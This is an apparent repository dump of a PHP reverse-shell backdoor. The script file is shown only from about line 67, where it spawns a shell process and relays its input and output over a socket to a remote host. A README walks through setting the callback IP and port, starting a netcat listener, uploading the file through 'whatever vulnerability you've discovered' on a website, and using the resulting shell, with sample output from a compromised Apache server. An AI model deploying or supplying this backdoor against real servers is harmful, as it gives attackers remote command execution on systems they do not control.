├── PHP-Reverse-Shell.php └── README.md /PHP-Reverse-Shell.php: -------------------------------------------------------------------------------- 1 | ["pipe", "r"], // stdin 68 | 1 => ["pipe", "w"], // stdout 69 | 2 => ["pipe", "w"] // stderr 70 | ]; 71 | 72 | // Spawn the shell process 73 | $process = proc_open($shell, $descriptorspec, $pipes); 74 | if (!is_resource($process)) { 75 | printit("ERROR: Can't spawn shell"); 76 | exit(1); 77 | } 78 | 79 | // Set the streams to non-blocking mode 80 | foreach ($pipes as $pipe) { 81 | stream_set_blocking($pipe, 0); 82 | } 83 | stream_set_blocking($sock, 0); 84 | 85 | printit("Successfully opened reverse shell to $ip:$port"); 86 | 87 | // Main loop to handle communication 88 | while (1) { 89 | if (feof($sock)) { 90 | printit("ERROR: Shell connection terminated"); 91 | break; 92 | } 93 | if (feof($pipes[1])) { 94 | printit("ERROR: Shell process terminated"); 95 | break; 96 | } 97 | 98 | $read_a = [$sock, $pipes[1], $pipes[2]]; 99 | $num_changed_sockets = stream_select($read_a, $write_a = null, $error_a = null, null); 100 | 101 | if ($num_changed_sockets === false) { 102 | printit("ERROR: stream_select failed"); 103 | break; 104 | } 105 | 106 | if (in_array($sock, $read_a)) { 107 | $input = fread($sock, $chunk_size); 108 | fwrite($pipes[0], $input); 109 | } 110 | 111 | if (in_array($pipes[1], $read_a)) { 112 | $output = fread($pipes[1], $chunk_size); 113 | fwrite($sock, $output); 114 | } 115 | 116 | if (in_array($pipes[2], $read_a)) { 117 | $error_output = fread($pipes[2], $chunk_size); 118 | fwrite($sock, $error_output); 119 | } 120 | } 121 | 122 | // Clean up 123 | fclose($sock); 124 | foreach ($pipes as $pipe) { 125 | fclose($pipe); 126 | } 127 | proc_close($process); 128 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Walk Through 2 | - [x] **Modify the source** 3 | - To prevent someone else from abusing your backdoor – a nightmare scenario while pentesting – you need to modify the source code to indicate where you want the reverse shell thrown back to. Edit the following lines of php-reverse-shell.php: 4 | ______________ 5 | | Variable | Default | Personal? | 6 | | ------------- |:----------------------:| -------------------------------:| 7 | | $ip | __127.0.0.1__ | Edit __line 7__ | 8 | | $port | __1234__ | Edit __line 8__ | 9 | ______________ 10 | 11 | - [x] **Get Ready to catch the reverse shell** 12 | - Start a TCP listener on a host and port that will be accessible by the web server. Use the same port here as you specified in the script (1234 in this example): 13 | ``` 14 | $ nc -v -n -l -p 1234 15 | ``` 16 | - [x] **Upload and Run the script** 17 | - Using whatever vulnerability you’ve discovered in the website, upload php-reverse-shell.php. Run the script simply by browsing to the newly uploaded file in your web browser (NB: You won’t see any output on the web page, it’ll just hang if successful): 18 | ``` 19 | http://somesite/php-reverse-shell.php 20 | ``` 21 | - [x] **Enjoy your new shell** 22 | - If all went well, the web server should have thrown back a shell to your netcat listener. Some useful commans such as w, uname -a, id and pwd are run automatically for you: 23 | ``` 24 | $ nc -v -n -l -p 1234 25 | listening on [any] 1234 ... 26 | connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58012 27 | Linux somehost 2.6.19-gentoo-r5 #1 SMP PREEMPT Sun Apr 1 16:49:38 BST 2007 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux 28 | 16:59:28 up 39 days, 19:54, 2 users, load average: 0.18, 0.13, 0.10 29 | USER TTY LOGIN@ IDLE JCPU PCPU WHAT 30 | root :0 19May07 ?xdm? 5:10m 0.01s /bin/sh 31 | uid=81(apache) gid=81(apache) groups=81(apache) 32 | sh: no job control in this shell 33 | sh-3.2$ 34 | ``` 35 | --------------------------------------------------------------------------------